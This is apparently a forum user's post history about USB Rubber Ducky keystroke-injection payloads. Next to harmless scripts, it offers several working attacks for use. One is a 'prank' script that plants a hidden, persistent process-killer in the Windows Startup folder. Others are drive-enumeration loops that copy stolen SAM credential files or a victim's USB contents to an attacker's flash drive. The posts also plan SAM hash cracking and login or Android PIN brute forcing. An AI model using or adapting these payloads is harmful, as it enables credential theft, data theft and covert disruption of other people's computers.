-
Posts
742 -
Joined
-
Last visited
-
Days Won
5
Posts posted by overwraith
-
-
-
I havent had a chance to take a look at the firmware source code, or look into firmware creation, but I hope to as soon as I find some more time. I was just curious, as to whether or not it is possible to create firmware that selects the type of keyboard for the duckey randomly, ex...Dell keyboard, generic logitech keyboard, etc.
My reason for asking is that it is probably just a matter of time until someone figures out how to ban the keyboard type the duckey uses.
I dont want to create any more work for the developers just yet, since I hear they are very buisy. This is just some food for thought.
-
Keep up the good work snake, we all know you have been working hard.
-
This is going to need approached from another language instead of batch. Mabe VBS, Python, or Powershell.
-
What would be better is a windows and or linux app that organizes payloads and does all the commands to upload to the sd card, no offence but loading payloads the current way is just as cumbersome or worse than using a gui (arduino) and a teensy. There is also an anoying bug where java needs to be added to some setting inside dos, having an app to fix common issues would be cool:-)
I was looking into making an android app that I could just select the payload from the development files on my SD card, but that quickly fell through when I couldnt find any RTF file support in android. It would be cool if we (the community) could make android gui/friendly compiler, because that would mean you could compile from your phone or tablet. Would mean mobile payload selection.
YAY, someone mentioned my SAM payload improvement on the web show!!!
-
I think I speak for a lot of duck scripters here when I say how do we program the duck with C++ like shown here? Did I miss a memo? Where the tutorial on that awesomeness?
-
Im glad people think this is cool, I will look into using SamInside or the export to NTLM hashes then cain or GPU cracker. As far as the methods of recording more than one SAM, I will look into both methods, the %computername%, and accumulating in a text file. I am a little worried with the accumulation into a text file that programs will have trouble reading the back to back encrypted data, but if all sam files are the same size, then it should'nt be a problem, as we can always parse the data via command filters/flags, or seperate it into other files later. Good points from everybody.
-
Started working on getting the used space on a drive, and I tried to make a "for" loop to do that too, and got some weird output. So for our resident bug hunters, does this look like a variable overflow situation?
cmd.exe /V:ON
Set /A usedSpace=0
for /R %i in (*) do Set /A usedSpace+=%~zi
Yields>
C:\>Set /A usedSpace+=8635
-1933490268
C:\>Set /A usedSpace+=5379
-1933484889
C:\>Set /A usedSpace+=22368
-1933462521
C:\>Set /A usedSpace+=2048
-1933460473
C:\>Set /A usedSpace+=844
-1933459629
C:\>Set /A usedSpace+=4726
-1933454903
C:\>Set /A usedSpace+=5182
-1933449721
C:\>Set /A usedSpace+=153298
-1933296423
C:\>Set /A usedSpace+=31
-1933296392
C:\>Set /A usedSpace+=1142784
-1932153608
C:\>Set /A usedSpace+=1630208
-1930523400
C:\>Set /A usedSpace+=540672
-1929982728
C:\>
-
I am starting work on a Duckey USB file theft payload. The following codes will execute directly in the command prompt, and iterate through the possible drive letters, and ignore your "evac drive" (evac==evacuation) which will have a text file on the root evac.txt. The idea is to download 7zip, install it silently, then run the commands that will search out attached USB drives, and archive the files to your USB drive. The following is the code that will find the drives, and save them to a variable so we can send their locations to the 7zip application as arguments.
REM SET THE FLAG FOR ENABLE DELAYED ENVIRONMENT VARIABLE EXPANSION
REM FROM WHAT I UNDERSTAND THERE ARE INDIRECTION PROBLEMS WHEN NOT
REM SET AND THE VARIABLE IS CALLED MULTIPLE TIMES ON THE SAME LINE
cmd.exe /V:ON
REM IF SOME TEXT IS NOT ASSIGNED TO THIS VARIABLE THE LOOP WILL FAIL AND
REM CAUSE THE VARIABLE NAME TO BE ASSIGNED TO THE BEGINNING OF THE LIST
Set targetDr=*
REM THE FOR LOOP THAT SEEKS OUT SUITABLE DRIVES, HAS SOME NIFTY INDIRECTION
REM OPERATORS "!" WHICH ARE USED WHEN THE VARIABLE IS CALLED MULTIPLE
REM TIMES IN THE SAME LINE SO IT CAN TAKE ADVANTAGE OF THE ENABLED DELAYED
REM EXPANSION WE SET EARLIER
for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( IF NOT EXIST %a:\evac.txt If EXIST %a:\ SET targetDr=!targetDr! %a: )
REM REMOVE THE SINGLE CHARACTER OF TEXT WE ASSIGNED TO THE
REM LIST VARIABLE EARLIER
Set targetDr=%targetDr:~1%
REM SHOW ME THE OUTPUT
echo %targetDr%
The next great hurdle in this payload will be figuring out a way to determine the size of the attached drives, so we can tell whether or not it is a flash drive by its disk size. We don't want to end up trying to copy a hard drive to a flash drive that's not big enough.
If the "stealthyness" of this attack becomes a problem later, we can rely on something from the switchblade project to email the data to us.
-
This power shell download seems to work a lot better than the VBS version did. I have had a lot more luck downloading from sites that didn't support whatever protocol the VBS script did.
-
The color matters because the subsequent duck versions are all different colors. Typically each time the hardware changes the duck changes colors. I think the order goes something like this; green=version1, Red=version2, silver/white=version3, or something like that. The green ducks had a lock on the SD card that involved pulling out a lever to release the SD card, all subsequent versions are removable simply by pulling the SD card out the back(first time typically needs a pair of tweezers).
-
Got one of the payloads to find a second USB, short "for" loop on my posting;
http://forums.hak5.o...to-sam-payload/
Made mine specifically for the SAM theft payload, but the command can be modified.
-
The following is a prank script that runs a batch loop that kills processes that you specify. A key characteristic of this particular script is that it uses a vbs script to run the batch script silently. When I was making this script I was surprised to learn that newer OSes do not run batch scripts silently. I got the vbs script someplace else, but I don't remember where. I have seen this script online on several websites though. The naming conventions of the files produced is intentionally ambiguous, ex...a.bat, b.vbs.
CONTROL ESC DELAY 200 STRING cmd ENTER REM A Different directory in case the second one is inaccessable DELAY 1000 STRING cd %userprofile%\Downloads\ ENTER DELAY 1000 STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ ENTER DELAY 100 REM Delete batch file if already exists STRING erase /Q a.bat ENTER REM Make the batch file STRING copy con a.bat ENTER DELAY 100 STRING @echo off ENTER STRING :Start ENTER STRING taskkill /f /im "iexplore.exe" ENTER STRING taskkill /f /im "firefox.exe" ENTER STRING taskkill /f /im "devenv.exe" ENTER STRING taskkill /f /im "pennote.exe" ENTER STRING timeout /t 30 ENTER STRING Goto Start ENTER CONTROL Z ENTER DELAY 100 REM Only way to run a batch file silently on vista/Win7 REM Delete vbs file if already exists STRING erase /Q b.vbs ENTER STRING copy con b.vbs ENTER STRING Set WshShell = CreateObject("WScript.Shell") ENTER STRING WshShell.Run chr(34) & "a.bat" & Chr(34), 0 ENTER STRING Set WshShell = Nothing CONTROL Z ENTER STRING b.vbs ENTER DELAY 100 STRING EXIT ENTER
-
Looks like all the bugs were worked out with that last command. Anyone have some batch magic for renaming the SAM like the following;
SAM --> SAM1
--> SAM2
--> SAM3
--> SAM4
; So we can store multiple user SAM's without loosing the ones we have already collected? Also, does anyone have a program for brute forcing the password out of these SAM's?
-
I spoke a little too soon, don't use CD for change directory as I did in the first post, use the following;
for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: )
-
If you add a removable flash drive and USB hub to the duckey SAM attack (take em with you in your pocket + use the hub to plug in simultaneously) and add the file evac.txt to the flash drives root you can replace the CD <Directory> command in the SAM payload with this command which will auto-magically send the SAM file to the flash drive. If we ever get the mass storage firmware we wont even need the hub and flash drive. I am still testing this, so an additional delay may need added after this command.
STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt cd %a:\ )
-
Unfortunately in windows vista MS paint is a little bit different. The custom color picker selects a seemingly random color slot after you input the first couple of colors. It seems unfeasible to create a duck script for this action on vista.
-
Here is a tweaked version that has a delete command so the duckscript can be run multiple times on computers without any problems.
Tried to use the WRITELINE command to replace the STRING ENTER commands, but it looks like the delay command on the online compiler may not work for WRITELINE. Couldnt find a way to slow the commands down enough to prevent the script from messing up. Defaulted back to STRING ENTER commands.REM MOBILETABS.TXT BEGINS REM HIDE COMMAND WINDOW CONTROL ESCAPE STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM DELETE THE SCRIPT IF IT ALREADY EXISTS STRING DEL /Q MobileTabs.vbs ENTER REM VB SCRIPT FOUND AT: REM [url="http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.htmlinternetexplorer"]http://www.vistahead...nternetexplorer[/url] REM INPUT FILE MobileTabs.vbs STRING copy con MobileTabs.vbs ENTER STRING on error resume next ENTER STRING navOpenInBackgroundTab = &h1000 ENTER STRING set oIE = CreateObject("InternetExplorer.Application") ENTER STRING Set args = WScript.Arguments ENTER STRING oIE.Navigate2 args.Item(0) ENTER STRING for intx = 1 to args.count ENTER STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab ENTER STRING next ENTER STRING oIE.Visible = true ENTER CONTROL Z ENTER REM LATER WILL TYPE THE WEBSITES TO A TEXT FILE, REM AND SEND THE FILE TO THE VB SCRIPT REM RUN THE VB SCRIPT TO LAUNCH INTERNET EXPLORER STRING MobileTabs.vbs [url="http://www.google.com/"]http://www.google.com/[/url] [url="http://mwomercs.com/"]http://mwomercs.com/[/url] [url="http://hak5.org/"]http://hak5.org/[/url] [url="http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/"]http://forums.hak5.o...b-rubber-ducky/[/url] ENTER
-
The following is some duck script I made for easily setting up the MS Paint hack from way back in episode 925. Machines secured correctly with group policies are not susceptible to this attack. You are still required to save the file correctly, and input the colors in the correct order, but they should already be in the correct order in the custom color box. This particular variant only works on Windows 7, but could be easily modified for Vista.
REM MSPAINT hack revealed by "Operator" CONTROL ESCAPE DELAY 200 STRING mspaint ENTER DELAY 1000 CTRL E STRING 6 TAB STRING 1 Enter CTRL PAGEUP REPEAT 5 REM ****FIRST COLOR**** ALT H STRING EC ALT R STRING 10 TAB STRING 0 TAB STRING 0 ENTER REM ****SECOND COLOR**** ALT H STRING EC ALT R STRING 13 TAB STRING 10 TAB STRING 13 ENTER REM ****THIRD COLOR**** ALT H STRING EC ALT R STRING 100 TAB STRING 109 TAB STRING 99 ENTER REM ****FOURTH COLOR**** ALT H STRING EC ALT R STRING 120 TAB STRING 101 TAB STRING 46 ENTER REM ****FIFTH COLOR**** ALT H STRING EC ALT R STRING 0 TAB STRING 0 TAB STRING 101 ENTER REM ****SIXTH COLOR**** ALT H STRING EC ALT R STRING 0 TAB STRING 0 TAB STRING 0 ENTER
-
You got a good point about just grabbing the SAM file instead of preforming a Brute force on site. I'm not really a pen tester or hacker, so I'm just starting to learn the ropes. Thanks for the reply.
-
Here is some duck script I made that;
-Types in a VB Script that opens tabs in internet explorer
-Runs the VB Script with the proper arguments that opens the desired webpages in internet explorer.
Not exactly hacking, but could be useful to somebody.
The VB Script was written by somebody else and the authors post can be found at:
http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.html
Made the duck script specifically so I could pick up and move permalinks from databases like ebsco host to other computers and quickly open them during the research stages of papers.REM MOBILETABS.TXT BEGINS REM HIDE COMMAND WINDOW CONTROL ESCAPE STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM VB SCRIPT FOUND AT: REM http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.htmlinternetexplorer REM INPUT FILE MobileTabs.vbs STRING copy con MobileTabs.vbs ENTER STRING on error resume next ENTER STRING navOpenInBackgroundTab = &h1000 ENTER STRING set oIE = CreateObject("InternetExplorer.Application") ENTER STRING Set args = WScript.Arguments ENTER STRING oIE.Navigate2 args.Item(0) ENTER STRING for intx = 1 to args.count ENTER STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab ENTER STRING next ENTER STRING oIE.Visible = true ENTER CONTROL Z Enter REM LATER WILL TYPE THE WEBSITES TO A TEXT FILE, REM AND SEND THE FILE TO THE VB SCRIPT REM RUN THE VB SCRIPT TO LAUNCH INTERNET EXPLORER STRING MobileTabs.vbs http://www.google.com/ http://mwomercs.com/ http://hak5.org/ http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/ Enter
-
Kinda resurrecting a dead topic, but actually, mouse movement could add a lot of functionality to the USB Rubber Duckey. If you know the screen size of your target, and use something like the Logitech G13 and its internal Lua scripting to grab screen pixel values, and you full screened some applications, you could use any buttons on the application with the Duckey regardless of whether they support key combos. On the same token, however you could probably program the Logitech G13 to do pretty much anything the Duckey can anyway. I prefer the Duckey though, since it is a small and flash drive like poison pill.
-
I have looked around for brute forcer code, and discovered that the number of combinations required for even 4 character passwords make it impractical to impliment a duckey brute forcer. The only way to possably make this feasible would be to use something like CUPP the common user password profiler to generate a small password file, and then use a modified version of my duckscript converter or someone elses duckscript converter to turn the file to duckscript. Even then it still might prove impractical. Probably best to keep the duck running command line exploits and payloads ect.
-
Does anyone know if anyone has made a duckey login brute forcer?
Any tips if I wanted to make my own?
I would probably use a java app to generate the duckscript based on a dictionary file.
If I had multiple ducks and multiple computers, say an un-gaurded computer lab, I could probably get in faster.
[Payload] Android Brute Force 4-digit pin
in Classic USB Rubber Ducky
Posted · Edited by overwraith
I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.
C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec
ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$
/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE
R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
C:\Users\UserName\Desktop>dir android*
Volume in drive C has no label.
Volume Serial Number is 2499-C7D7
Directory of C:\Users\UserName\Desktop
07/07/2012 01:03 AM 165 Android Paths.txt
08/30/2012 08:00 PM 50 Android SDK Path.txt
12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt
3 File(s) 278 bytes
0 Dir(s) 831,818,436,608 bytes free
C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt
DELAY 5000 ; echo {0000..9999}
STRING
DELAY 1000
ENTER
ENTER
C:\Users\UserName\Desktop>